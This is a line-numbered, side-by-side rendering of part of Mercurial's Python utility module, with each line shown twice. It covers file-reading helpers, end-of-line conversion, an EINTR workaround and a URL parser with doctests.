2278 def filechunkiter(f, size=131072, limit=None):
2281 """Create a generator that produces the data in the file size
2279 """Create a generator that produces the data in the file size
2282 (default 131072) bytes at a time, up to optional limit (default is
2280 (default 131072) bytes at a time, up to optional limit (default is
2283 to read all data). Chunks may be less than size bytes if the
2281 to read all data). Chunks may be less than size bytes if the
2284 chunk is the last chunk in the file, or the file is a socket or
2282 chunk is the last chunk in the file, or the file is a socket or
2285 some other type of file that sometimes reads less data than is
2283 some other type of file that sometimes reads less data than is
2286 requested."""
2284 requested."""
2287 assert size >= 0
2285 assert size >= 0
2288 assert limit is None or limit >= 0
2286 assert limit is None or limit >= 0
2289 while True:
2287 while True:
2290 if limit is None:
2288 if limit is None:
2291 nbytes = size
2289 nbytes = size
2292 else:
2290 else:
2293 nbytes = min(limit, size)
2291 nbytes = min(limit, size)
2294 s = nbytes and f.read(nbytes)
2292 s = nbytes and f.read(nbytes)
2295 if not s:
2293 if not s:
2296 break
2294 break
2297 if limit:
2295 if limit:
2298 limit -= len(s)
2296 limit -= len(s)
2299 yield s
2297 yield s
2300
2298
2301 class cappedreader(object):
2299 class cappedreader(object):
2302 """A file object proxy that allows reading up to N bytes.
2300 """A file object proxy that allows reading up to N bytes.
2303
2301
2304 Given a source file object, instances of this type allow reading up to
2302 Given a source file object, instances of this type allow reading up to
2305 N bytes from that source file object. Attempts to read past the allowed
2303 N bytes from that source file object. Attempts to read past the allowed
2306 limit are treated as EOF.
2304 limit are treated as EOF.
2307
2305
2308 It is assumed that I/O is not performed on the original file object
2306 It is assumed that I/O is not performed on the original file object
2309 in addition to I/O that is performed by this instance. If there is,
2307 in addition to I/O that is performed by this instance. If there is,
2310 state tracking will get out of sync and unexpected results will ensue.
2308 state tracking will get out of sync and unexpected results will ensue.
2311 """
2309 """
2312 def __init__(self, fh, limit):
2310 def __init__(self, fh, limit):
2313 """Allow reading up to <limit> bytes from <fh>."""
2311 """Allow reading up to <limit> bytes from <fh>."""
2314 self._fh = fh
2312 self._fh = fh
2315 self._left = limit
2313 self._left = limit
2316
2314
2317 def read(self, n=-1):
2315 def read(self, n=-1):
2318 if not self._left:
2316 if not self._left:
2319 return b''
2317 return b''
2320
2318
2321 if n < 0:
2319 if n < 0:
2322 n = self._left
2320 n = self._left
2323
2321
2324 data = self._fh.read(min(n, self._left))
2322 data = self._fh.read(min(n, self._left))
2325 self._left -= len(data)
2323 self._left -= len(data)
2326 assert self._left >= 0
2324 assert self._left >= 0
2327
2325
2328 return data
2326 return data
2329
2327
2330 def readinto(self, b):
2328 def readinto(self, b):
2331 res = self.read(len(b))
2329 res = self.read(len(b))
2332 if res is None:
2330 if res is None:
2333 return None
2331 return None
2334
2332
2335 b[0:len(res)] = res
2333 b[0:len(res)] = res
2336 return len(res)
2334 return len(res)
2337
2335
2338 def unitcountfn(*unittable):
2336 def unitcountfn(*unittable):
2339 '''return a function that renders a readable count of some quantity'''
2337 '''return a function that renders a readable count of some quantity'''
2340
2338
2341 def go(count):
2339 def go(count):
2342 for multiplier, divisor, format in unittable:
2340 for multiplier, divisor, format in unittable:
2343 if abs(count) >= divisor * multiplier:
2341 if abs(count) >= divisor * multiplier:
2344 return format % (count / float(divisor))
2342 return format % (count / float(divisor))
2345 return unittable[-1][2] % count
2343 return unittable[-1][2] % count
2346
2344
2347 return go
2345 return go
2348
2346
2349 def processlinerange(fromline, toline):
2347 def processlinerange(fromline, toline):
2350 """Check that linerange <fromline>:<toline> makes sense and return a
2348 """Check that linerange <fromline>:<toline> makes sense and return a
2351 0-based range.
2349 0-based range.
2352
2350
2353 >>> processlinerange(10, 20)
2351 >>> processlinerange(10, 20)
2354 (9, 20)
2352 (9, 20)
2355 >>> processlinerange(2, 1)
2353 >>> processlinerange(2, 1)
2356 Traceback (most recent call last):
2354 Traceback (most recent call last):
2357 ...
2355 ...
2358 ParseError: line range must be positive
2356 ParseError: line range must be positive
2359 >>> processlinerange(0, 5)
2357 >>> processlinerange(0, 5)
2360 Traceback (most recent call last):
2358 Traceback (most recent call last):
2361 ...
2359 ...
2362 ParseError: fromline must be strictly positive
2360 ParseError: fromline must be strictly positive
2363 """
2361 """
2364 if toline - fromline < 0:
2362 if toline - fromline < 0:
2365 raise error.ParseError(_("line range must be positive"))
2363 raise error.ParseError(_("line range must be positive"))
2366 if fromline < 1:
2364 if fromline < 1:
2367 raise error.ParseError(_("fromline must be strictly positive"))
2365 raise error.ParseError(_("fromline must be strictly positive"))
2368 return fromline - 1, toline
2366 return fromline - 1, toline
2369
2367
2370 bytecount = unitcountfn(
2368 bytecount = unitcountfn(
2371 (100, 1 << 30, _('%.0f GB')),
2369 (100, 1 << 30, _('%.0f GB')),
2372 (10, 1 << 30, _('%.1f GB')),
2370 (10, 1 << 30, _('%.1f GB')),
2373 (1, 1 << 30, _('%.2f GB')),
2371 (1, 1 << 30, _('%.2f GB')),
2374 (100, 1 << 20, _('%.0f MB')),
2372 (100, 1 << 20, _('%.0f MB')),
2375 (10, 1 << 20, _('%.1f MB')),
2373 (10, 1 << 20, _('%.1f MB')),
2376 (1, 1 << 20, _('%.2f MB')),
2374 (1, 1 << 20, _('%.2f MB')),
2377 (100, 1 << 10, _('%.0f KB')),
2375 (100, 1 << 10, _('%.0f KB')),
2378 (10, 1 << 10, _('%.1f KB')),
2376 (10, 1 << 10, _('%.1f KB')),
2379 (1, 1 << 10, _('%.2f KB')),
2377 (1, 1 << 10, _('%.2f KB')),
2380 (1, 1, _('%.0f bytes')),
2378 (1, 1, _('%.0f bytes')),
2381 )
2379 )
2382
2380
2383 class transformingwriter(object):
2381 class transformingwriter(object):
2384 """Writable file wrapper to transform data by function"""
2382 """Writable file wrapper to transform data by function"""
2385
2383
2386 def __init__(self, fp, encode):
2384 def __init__(self, fp, encode):
2387 self._fp = fp
2385 self._fp = fp
2388 self._encode = encode
2386 self._encode = encode
2389
2387
2390 def close(self):
2388 def close(self):
2391 self._fp.close()
2389 self._fp.close()
2392
2390
2393 def flush(self):
2391 def flush(self):
2394 self._fp.flush()
2392 self._fp.flush()
2395
2393
2396 def write(self, data):
2394 def write(self, data):
2397 return self._fp.write(self._encode(data))
2395 return self._fp.write(self._encode(data))
2398
2396
2399 # Matches a single EOL which can either be a CRLF where repeated CR
2397 # Matches a single EOL which can either be a CRLF where repeated CR
2400 # are removed or a LF. We do not care about old Macintosh files, so a
2398 # are removed or a LF. We do not care about old Macintosh files, so a
2401 # stray CR is an error.
2399 # stray CR is an error.
2402 _eolre = remod.compile(br'\r*\n')
2400 _eolre = remod.compile(br'\r*\n')
2403
2401
2404 def tolf(s):
2402 def tolf(s):
2405 return _eolre.sub('\n', s)
2403 return _eolre.sub('\n', s)
2406
2404
2407 def tocrlf(s):
2405 def tocrlf(s):
2408 return _eolre.sub('\r\n', s)
2406 return _eolre.sub('\r\n', s)
2409
2407
2410 def _crlfwriter(fp):
2408 def _crlfwriter(fp):
2411 return transformingwriter(fp, tocrlf)
2409 return transformingwriter(fp, tocrlf)
2412
2410
2413 if pycompat.oslinesep == '\r\n':
2411 if pycompat.oslinesep == '\r\n':
2414 tonativeeol = tocrlf
2412 tonativeeol = tocrlf
2415 fromnativeeol = tolf
2413 fromnativeeol = tolf
2416 nativeeolwriter = _crlfwriter
2414 nativeeolwriter = _crlfwriter
2417 else:
2415 else:
2418 tonativeeol = pycompat.identity
2416 tonativeeol = pycompat.identity
2419 fromnativeeol = pycompat.identity
2417 fromnativeeol = pycompat.identity
2420 nativeeolwriter = pycompat.identity
2418 nativeeolwriter = pycompat.identity
2421
2419
2422 if (pyplatform.python_implementation() == 'CPython' and
2420 if (pyplatform.python_implementation() == 'CPython' and
2423 sys.version_info < (3, 0)):
2421 sys.version_info < (3, 0)):
2424 # There is an issue in CPython that some IO methods do not handle EINTR
2422 # There is an issue in CPython that some IO methods do not handle EINTR
2425 # correctly. The following table shows what CPython version (and functions)
2423 # correctly. The following table shows what CPython version (and functions)
2426 # are affected (buggy: has the EINTR bug, okay: otherwise):
2424 # are affected (buggy: has the EINTR bug, okay: otherwise):
2427 #
2425 #
2428 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2426 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2429 # --------------------------------------------------
2427 # --------------------------------------------------
2430 # fp.__iter__ | buggy | buggy | okay
2428 # fp.__iter__ | buggy | buggy | okay
2431 # fp.read* | buggy | okay [1] | okay
2429 # fp.read* | buggy | okay [1] | okay
2432 #
2430 #
2433 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2431 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2434 #
2432 #
2435 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2433 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2436 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2434 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2437 #
2435 #
2438 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2436 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2439 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2437 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2440 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2438 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2441 # fp.__iter__ but not other fp.read* methods.
2439 # fp.__iter__ but not other fp.read* methods.
2442 #
2440 #
2443 # On modern systems like Linux, the "read" syscall cannot be interrupted
2441 # On modern systems like Linux, the "read" syscall cannot be interrupted
2444 # when reading "fast" files like on-disk files. So the EINTR issue only
2442 # when reading "fast" files like on-disk files. So the EINTR issue only
2445 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2443 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2446 # files approximately as "fast" files and use the fast (unsafe) code path,
2444 # files approximately as "fast" files and use the fast (unsafe) code path,
2447 # to minimize the performance impact.
2445 # to minimize the performance impact.
2448 if sys.version_info >= (2, 7, 4):
2446 if sys.version_info >= (2, 7, 4):
2449 # fp.readline deals with EINTR correctly, use it as a workaround.
2447 # fp.readline deals with EINTR correctly, use it as a workaround.
2450 def _safeiterfile(fp):
2448 def _safeiterfile(fp):
2451 return iter(fp.readline, '')
2449 return iter(fp.readline, '')
2452 else:
2450 else:
2453 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2451 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2454 # note: this may block longer than necessary because of bufsize.
2452 # note: this may block longer than necessary because of bufsize.
2455 def _safeiterfile(fp, bufsize=4096):
2453 def _safeiterfile(fp, bufsize=4096):
2456 fd = fp.fileno()
2454 fd = fp.fileno()
2457 line = ''
2455 line = ''
2458 while True:
2456 while True:
2459 try:
2457 try:
2460 buf = os.read(fd, bufsize)
2458 buf = os.read(fd, bufsize)
2461 except OSError as ex:
2459 except OSError as ex:
2462 # os.read only raises EINTR before any data is read
2460 # os.read only raises EINTR before any data is read
2463 if ex.errno == errno.EINTR:
2461 if ex.errno == errno.EINTR:
2464 continue
2462 continue
2465 else:
2463 else:
2466 raise
2464 raise
2467 line += buf
2465 line += buf
2468 if '\n' in buf:
2466 if '\n' in buf:
2469 splitted = line.splitlines(True)
2467 splitted = line.splitlines(True)
2470 line = ''
2468 line = ''
2471 for l in splitted:
2469 for l in splitted:
2472 if l[-1] == '\n':
2470 if l[-1] == '\n':
2473 yield l
2471 yield l
2474 else:
2472 else:
2475 line = l
2473 line = l
2476 if not buf:
2474 if not buf:
2477 break
2475 break
2478 if line:
2476 if line:
2479 yield line
2477 yield line
2480
2478
2481 def iterfile(fp):
2479 def iterfile(fp):
2482 fastpath = True
2480 fastpath = True
2483 if type(fp) is file:
2481 if type(fp) is file:
2484 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2482 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2485 if fastpath:
2483 if fastpath:
2486 return fp
2484 return fp
2487 else:
2485 else:
2488 return _safeiterfile(fp)
2486 return _safeiterfile(fp)
2489 else:
2487 else:
2490 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2488 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2491 def iterfile(fp):
2489 def iterfile(fp):
2492 return fp
2490 return fp
2493
2491
2494 def iterlines(iterator):
2492 def iterlines(iterator):
2495 for chunk in iterator:
2493 for chunk in iterator:
2496 for line in chunk.splitlines():
2494 for line in chunk.splitlines():
2497 yield line
2495 yield line
2498
2496
2499 def expandpath(path):
2497 def expandpath(path):
2500 return os.path.expanduser(os.path.expandvars(path))
2498 return os.path.expanduser(os.path.expandvars(path))
2501
2499
2502 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2500 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2503 """Return the result of interpolating items in the mapping into string s.
2501 """Return the result of interpolating items in the mapping into string s.
2504
2502
2505 prefix is a single character string, or a two character string with
2503 prefix is a single character string, or a two character string with
2506 a backslash as the first character if the prefix needs to be escaped in
2504 a backslash as the first character if the prefix needs to be escaped in
2507 a regular expression.
2505 a regular expression.
2508
2506
2509 fn is an optional function that will be applied to the replacement text
2507 fn is an optional function that will be applied to the replacement text
2510 just before replacement.
2508 just before replacement.
2511
2509
2512 escape_prefix is an optional flag that allows using doubled prefix for
2510 escape_prefix is an optional flag that allows using doubled prefix for
2513 its escaping.
2511 its escaping.
2514 """
2512 """
2515 fn = fn or (lambda s: s)
2513 fn = fn or (lambda s: s)
2516 patterns = '|'.join(mapping.keys())
2514 patterns = '|'.join(mapping.keys())
2517 if escape_prefix:
2515 if escape_prefix:
2518 patterns += '|' + prefix
2516 patterns += '|' + prefix
2519 if len(prefix) > 1:
2517 if len(prefix) > 1:
2520 prefix_char = prefix[1:]
2518 prefix_char = prefix[1:]
2521 else:
2519 else:
2522 prefix_char = prefix
2520 prefix_char = prefix
2523 mapping[prefix_char] = prefix_char
2521 mapping[prefix_char] = prefix_char
2524 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2522 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2525 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2523 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2526
2524
2527 def getport(port):
2525 def getport(port):
2528 """Return the port for a given network service.
2526 """Return the port for a given network service.
2529
2527
2530 If port is an integer, it's returned as is. If it's a string, it's
2528 If port is an integer, it's returned as is. If it's a string, it's
2531 looked up using socket.getservbyname(). If there's no matching
2529 looked up using socket.getservbyname(). If there's no matching
2532 service, error.Abort is raised.
2530 service, error.Abort is raised.
2533 """
2531 """
2534 try:
2532 try:
2535 return int(port)
2533 return int(port)
2536 except ValueError:
2534 except ValueError:
2537 pass
2535 pass
2538
2536
2539 try:
2537 try:
2540 return socket.getservbyname(pycompat.sysstr(port))
2538 return socket.getservbyname(pycompat.sysstr(port))
2541 except socket.error:
2539 except socket.error:
2542 raise error.Abort(_("no port number associated with service '%s'")
2540 raise error.Abort(_("no port number associated with service '%s'")
2543 % port)
2541 % port)
2544
2542
2545 class url(object):
2543 class url(object):
2546 r"""Reliable URL parser.
2544 r"""Reliable URL parser.
2547
2545
2548 This parses URLs and provides attributes for the following
2546 This parses URLs and provides attributes for the following
2549 components:
2547 components:
2550
2548
2551 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2549 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2552
2550
2553 Missing components are set to None. The only exception is
2551 Missing components are set to None. The only exception is
2554 fragment, which is set to '' if present but empty.
2552 fragment, which is set to '' if present but empty.
2555
2553
2556 If parsefragment is False, fragment is included in query. If
2554 If parsefragment is False, fragment is included in query. If
2557 parsequery is False, query is included in path. If both are
2555 parsequery is False, query is included in path. If both are
2558 False, both fragment and query are included in path.
2556 False, both fragment and query are included in path.
2559
2557
2560 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2558 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2561
2559
2562 Note that for backward compatibility reasons, bundle URLs do not
2560 Note that for backward compatibility reasons, bundle URLs do not
2563 take host names. That means 'bundle://../' has a path of '../'.
2561 take host names. That means 'bundle://../' has a path of '../'.
2564
2562
2565 Examples:
2563 Examples:
2566
2564
2567 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2565 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2568 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2566 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2569 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2567 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2570 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2568 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2571 >>> url(b'file:///home/joe/repo')
2569 >>> url(b'file:///home/joe/repo')
2572 <url scheme: 'file', path: '/home/joe/repo'>
2570 <url scheme: 'file', path: '/home/joe/repo'>
2573 >>> url(b'file:///c:/temp/foo/')
2571 >>> url(b'file:///c:/temp/foo/')
2574 <url scheme: 'file', path: 'c:/temp/foo/'>
2572 <url scheme: 'file', path: 'c:/temp/foo/'>
2575 >>> url(b'bundle:foo')
2573 >>> url(b'bundle:foo')
2576 <url scheme: 'bundle', path: 'foo'>
2574 <url scheme: 'bundle', path: 'foo'>
2577 >>> url(b'bundle://../foo')
2575 >>> url(b'bundle://../foo')
2578 <url scheme: 'bundle', path: '../foo'>
2576 <url scheme: 'bundle', path: '../foo'>
2579 >>> url(br'c:\foo\bar')
2577 >>> url(br'c:\foo\bar')
2580 <url path: 'c:\\foo\\bar'>
2578 <url path: 'c:\\foo\\bar'>
2581 >>> url(br'\\blah\blah\blah')
2579 >>> url(br'\\blah\blah\blah')
2582 <url path: '\\\\blah\\blah\\blah'>
2580 <url path: '\\\\blah\\blah\\blah'>
2583 >>> url(br'\\blah\blah\blah#baz')
2581 >>> url(br'\\blah\blah\blah#baz')
2584 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2582 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2585 >>> url(br'file:///C:\users\me')
2583 >>> url(br'file:///C:\users\me')
2586 <url scheme: 'file', path: 'C:\\users\\me'>
2584 <url scheme: 'file', path: 'C:\\users\\me'>
2587
2585
2588 Authentication credentials:
2586 Authentication credentials:
2589
2587
2590 >>> url(b'ssh://joe:xyz@x/repo')
2588 >>> url(b'ssh://joe:xyz@x/repo')
2591 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2589 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2592 >>> url(b'ssh://joe@x/repo')
2590 >>> url(b'ssh://joe@x/repo')
2593 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2591 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2594
2592
2595 Query strings and fragments:
2593 Query strings and fragments:
2596
2594
2597 >>> url(b'http://host/a?b#c')
2595 >>> url(b'http://host/a?b#c')
2598 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2596 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2599 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2597 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2600 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2598 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2601
2599
2602 Empty path:
2600 Empty path:
2603
2601
2604 >>> url(b'')
2602 >>> url(b'')
2605 <url path: ''>
2603 <url path: ''>
2606 >>> url(b'#a')
2604 >>> url(b'#a')
2607 <url path: '', fragment: 'a'>
2605 <url path: '', fragment: 'a'>
2608 >>> url(b'http://host/')
2606 >>> url(b'http://host/')
2609 <url scheme: 'http', host: 'host', path: ''>
2607 <url scheme: 'http', host: 'host', path: ''>
2610 >>> url(b'http://host/#a')
2608 >>> url(b'http://host/#a')
2611 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2609 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2612
2610
2613 Only scheme:
2611 Only scheme:
2614
2612
2615 >>> url(b'http:')
2613 >>> url(b'http:')
2616 <url scheme: 'http'>
2614 <url scheme: 'http'>
2617 """
2615 """
2618
2616
2619 _safechars = "!~*'()+"
2617 _safechars = "!~*'()+"
2620 _safepchars = "/!~*'()+:\\"
2618 _safepchars = "/!~*'()+:\\"
2621 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2619 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2622
2620
2623 def __init__(self, path, parsequery=True, parsefragment=True):
2621 def __init__(self, path, parsequery=True, parsefragment=True):
2624 # We slowly chomp away at path until we have only the path left
2622 # We slowly chomp away at path until we have only the path left
2625 self.scheme = self.user = self.passwd = self.host = None
2623 self.scheme = self.user = self.passwd = self.host = None
2626 self.port = self.path = self.query = self.fragment = None
2624 self.port = self.path = self.query = self.fragment = None
2627 self._localpath = True
2625 self._localpath = True
2628 self._hostport = ''
2626 self._hostport = ''
2629 self._origpath = path
2627 self._origpath = path
2630
2628
2631 if parsefragment and '#' in path:
2629 if parsefragment and '#' in path:
2632 path, self.fragment = path.split('#', 1)
2630 path, self.fragment = path.split('#', 1)
2633
2631
2634 # special case for Windows drive letters and UNC paths
2632 # special case for Windows drive letters and UNC paths
2635 if hasdriveletter(path) or path.startswith('\\\\'):
2633 if hasdriveletter(path) or path.startswith('\\\\'):
2636 self.path = path
2634 self.path = path
2637 return
2635 return
2638
2636
2639 # For compatibility reasons, we can't handle bundle paths as
2637 # For compatibility reasons, we can't handle bundle paths as
2640 # normal URLS
2638 # normal URLS
2641 if path.startswith('bundle:'):
2639 if path.startswith('bundle:'):
2642 self.scheme = 'bundle'
2640 self.scheme = 'bundle'
2643 path = path[7:]
2641 path = path[7:]
2644 if path.startswith('//'):
2642 if path.startswith('//'):
2645 path = path[2:]
2643 path = path[2:]
2646 self.path = path
2644 self.path = path
2647 return
2645 return
2648
2646
2649 if self._matchscheme(path):
2647 if self._matchscheme(path):
2650 parts = path.split(':', 1)
2648 parts = path.split(':', 1)
2651 if parts[0]:
2649 if parts[0]:
2652 self.scheme, path = parts
2650 self.scheme, path = parts
2653 self._localpath = False
2651 self._localpath = False
2654
2652
2655 if not path:
2653 if not path:
2656 path = None
2654 path = None
2657 if self._localpath:
2655 if self._localpath:
2658 self.path = ''
2656 self.path = ''
2659 return
2657 return
2660 else:
2658 else:
2661 if self._localpath:
2659 if self._localpath:
2662 self.path = path
2660 self.path = path
2663 return
2661 return
2664
2662
2665 if parsequery and '?' in path:
2663 if parsequery and '?' in path:
2666 path, self.query = path.split('?', 1)
2664 path, self.query = path.split('?', 1)
2667 if not path:
2665 if not path:
2668 path = None
2666 path = None
2669 if not self.query:
2667 if not self.query:
2670 self.query = None
2668 self.query = None
2671
2669
2672 # // is required to specify a host/authority
2670 # // is required to specify a host/authority
2673 if path and path.startswith('//'):
2671 if path and path.startswith('//'):
2674 parts = path[2:].split('/', 1)
2672 parts = path[2:].split('/', 1)
2675 if len(parts) > 1:
2673 if len(parts) > 1:
2676 self.host, path = parts
2674 self.host, path = parts
2677 else:
2675 else:
2678 self.host = parts[0]
2676 self.host = parts[0]
2679 path = None
2677 path = None
2680 if not self.host:
2678 if not self.host:
2681 self.host = None
2679 self.host = None
2682 # path of file:///d is /d
2680 # path of file:///d is /d
2683 # path of file:///d:/ is d:/, not /d:/
2681 # path of file:///d:/ is d:/, not /d:/
2684 if path and not hasdriveletter(path):
2682 if path and not hasdriveletter(path):
2685 path = '/' + path
2683 path = '/' + path
2686
2684
2687 if self.host and '@' in self.host:
2685 if self.host and '@' in self.host:
2688 self.user, self.host = self.host.rsplit('@', 1)
2686 self.user, self.host = self.host.rsplit('@', 1)
2689 if ':' in self.user:
2687 if ':' in self.user:
2690 self.user, self.passwd = self.user.split(':', 1)
2688 self.user, self.passwd = self.user.split(':', 1)
2691 if not self.host:
2689 if not self.host:
2692 self.host = None
2690 self.host = None
2693
2691
2694 # Don't split on colons in IPv6 addresses without ports
2692 # Don't split on colons in IPv6 addresses without ports
2695 if (self.host and ':' in self.host and
2693 if (self.host and ':' in self.host and
2696 not (self.host.startswith('[') and self.host.endswith(']'))):
2694 not (self.host.startswith('[') and self.host.endswith(']'))):
2697 self._hostport = self.host
2695 self._hostport = self.host
2698 self.host, self.port = self.host.rsplit(':', 1)
2696 self.host, self.port = self.host.rsplit(':', 1)
2699 if not self.host:
2697 if not self.host:
2700 self.host = None
2698 self.host = None
2701
2699
2702 if (self.host and self.scheme == 'file' and
2700 if (self.host and self.scheme == 'file' and
2703 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2701 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2704 raise error.Abort(_('file:// URLs can only refer to localhost'))
2702 raise error.Abort(_('file:// URLs can only refer to localhost'))
2705
2703
2706 self.path = path
2704 self.path = path
2707
2705
2708 # leave the query string escaped
2706 # leave the query string escaped
2709 for a in ('user', 'passwd', 'host', 'port',
2707 for a in ('user', 'passwd', 'host', 'port',
2710 'path', 'fragment'):
2708 'path', 'fragment'):
2711 v = getattr(self, a)
2709 v = getattr(self, a)
2712 if v is not None:
2710 if v is not None:
2713 setattr(self, a, urlreq.unquote(v))
2711 setattr(self, a, urlreq.unquote(v))
2714
2712
2715 @encoding.strmethod
2713 @encoding.strmethod
2716 def __repr__(self):
2714 def __repr__(self):
2717 attrs = []
2715 attrs = []
2718 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2716 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2719 'query', 'fragment'):
2717 'query', 'fragment'):
2720 v = getattr(self, a)
2718 v = getattr(self, a)
2721 if v is not None:
2719 if v is not None:
2722 attrs.append('%s: %r' % (a, v))
2720 attrs.append('%s: %r' % (a, v))
2723 return '<url %s>' % ', '.join(attrs)
2721 return '<url %s>' % ', '.join(attrs)
2724
2722
2725 def __bytes__(self):
2723 def __bytes__(self):
2726 r"""Join the URL's components back into a URL string.
2724 r"""Join the URL's components back into a URL string.
2727
2725
2728 Examples:
2726 Examples:
2729
2727
2730 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2728 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2731 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2729 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2732 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2730 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2733 'http://user:pw@host:80/?foo=bar&baz=42'
2731 'http://user:pw@host:80/?foo=bar&baz=42'
2734 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2732 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2735 'http://user:pw@host:80/?foo=bar%3dbaz'
2733 'http://user:pw@host:80/?foo=bar%3dbaz'
2736 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2734 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2737 'ssh://user:pw@[::1]:2200//home/joe#'
2735 'ssh://user:pw@[::1]:2200//home/joe#'
2738 >>> bytes(url(b'http://localhost:80//'))
2736 >>> bytes(url(b'http://localhost:80//'))
2739 'http://localhost:80//'
2737 'http://localhost:80//'
2740 >>> bytes(url(b'http://localhost:80/'))
2738 >>> bytes(url(b'http://localhost:80/'))
2741 'http://localhost:80/'
2739 'http://localhost:80/'
2742 >>> bytes(url(b'http://localhost:80'))
2740 >>> bytes(url(b'http://localhost:80'))
2743 'http://localhost:80/'
2741 'http://localhost:80/'
2744 >>> bytes(url(b'bundle:foo'))
2742 >>> bytes(url(b'bundle:foo'))
2745 'bundle:foo'
2743 'bundle:foo'
2746 >>> bytes(url(b'bundle://../foo'))
2744 >>> bytes(url(b'bundle://../foo'))
2747 'bundle:../foo'
2745 'bundle:../foo'
2748 >>> bytes(url(b'path'))
2746 >>> bytes(url(b'path'))
2749 'path'
2747 'path'
2750 >>> bytes(url(b'file:///tmp/foo/bar'))
2748 >>> bytes(url(b'file:///tmp/foo/bar'))
2751 'file:///tmp/foo/bar'
2749 'file:///tmp/foo/bar'
2752 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2750 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2753 'file:///c:/tmp/foo/bar'
2751 'file:///c:/tmp/foo/bar'
2754 >>> print(url(br'bundle:foo\bar'))
2752 >>> print(url(br'bundle:foo\bar'))
2755 bundle:foo\bar
2753 bundle:foo\bar
2756 >>> print(url(br'file:///D:\data\hg'))
2754 >>> print(url(br'file:///D:\data\hg'))
2757 file:///D:\data\hg
2755 file:///D:\data\hg
2758 """
2756 """
2759 if self._localpath:
2757 if self._localpath:
2760 s = self.path
2758 s = self.path
2761 if self.scheme == 'bundle':
2759 if self.scheme == 'bundle':
2762 s = 'bundle:' + s
2760 s = 'bundle:' + s
2763 if self.fragment:
2761 if self.fragment:
2764 s += '#' + self.fragment
2762 s += '#' + self.fragment
2765 return s
2763 return s
2766
2764
2767 s = self.scheme + ':'
2765 s = self.scheme + ':'
2768 if self.user or self.passwd or self.host:
2766 if self.user or self.passwd or self.host:
2769 s += '//'
2767 s += '//'
2770 elif self.scheme and (not self.path or self.path.startswith('/')
2768 elif self.scheme and (not self.path or self.path.startswith('/')
2771 or hasdriveletter(self.path)):
